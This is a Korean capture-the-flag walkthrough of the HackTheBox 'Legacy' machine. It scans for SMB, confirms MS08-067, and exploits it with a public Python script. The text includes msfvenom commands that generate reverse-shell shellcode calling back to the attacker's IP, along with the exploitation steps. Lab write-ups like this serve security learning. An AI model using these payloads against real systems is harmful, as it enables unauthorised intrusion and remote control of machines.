HackTheBox - Legacy

HackTheBox의 Legacy 머신을 한번 공격해보겠습니다.

- 구성환경

공격자 : 10.10.14.4

타겟 : 10.10.10.4

 

- 스캔

한번 포트 스캔을 해보겠습니다.

nmap -nP -n -p- -sV -sC -v --min-rate 5000 --max-retries 2 10.10.10.4 -oA LegacyPort

간단히 서비스에대해서 알아보고 넘어가겠습니다.

• msrpc : microsoft remote procedure call protocol의 줄임말로 네트워크 상에서 프로그램 간 통신을 위해 사용됩니다. 특히 smb(파일 프린터 공유를 위한 프로토롤)이 MSRPC를 사용하여 원격 호출을 처리합니다.
• netbios-ssn : 네트워크 상에서 컴퓨터 간에 통신을 제공하는 프로토콜입니다. 기본적으로 파일 및 프린터 공유를 위해 사용된 SMB 프로토콜에서 사용됩니다. 보통 139번 포트에서 사용되지만 보안상의 이유로 많은 기업에서 차단하고 있습니다.
• microsoft-ds : SMB프로토콜의 확장버전으로 다양한 파일 및 프린터 공유 기능을 지원합니다. 보통 445 포트에서 많이 실행됩니다.

실행되는 버전을 보니 굉장히 취약할 것 같은 window XP가 보입니다. 그리고 SMB 프로토콜을 사용하고 있습니다. SMB 프로토콜의 취약점중 대표적인 것은 ms08_067입니다. CVE번호는 CVE-2008-4250입니다. 한번 ms08_067 취약점을 가지고 있는지 nmap NSE를 사용해 다시한번 스캔 해보겠습니다.

nmap -nP -n -p 445 --script smb-vuln-ms08-067.nse --script-args=unsafe=1 10.10.10.4

취약하다고 나옵니다. 이 취약점을 가지고 침투해보겠습니다.

 

- 침투

먼저 취약점에따른 exploit 코드를 아래 사이트에서 가져옵니다.

https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py

GitHub - jivoi/pentest: offsec batteries included

그리고 쉘코드 부분을 주석을 확인해봅시다.

# Reverse TCP shellcode from metasploit; port 4444 IP 192.168.56.1; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
# Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
# EXITFUNC=thread Important!
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c

 

 

쉘코드는 메타스플로잇에서 뽑아야한다고 합니다. 주어진 값을 사용해서 뽑아봅시다.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

아웃풋으로 나온 쉘코드를 파이썬 코드중에서 변경해줍니다.

저장후 리버스쉘을 열어주고 실행시켜보겠습니다.

사용방법을 알려줍니다. SP0랑 SP1은 너무 오래됫으니 window XP SP3 English인 6번으로 해보겠습니다.

실제 침투가 완료된 것을 확인할 수 있습니다.

 

- 권한 상승

권한 상승이 필요한지 알았지만 모든 파일에 접근이 가능합니다. 따라서 권한 상승을 할 필요는 없습니다.

 

- 플래그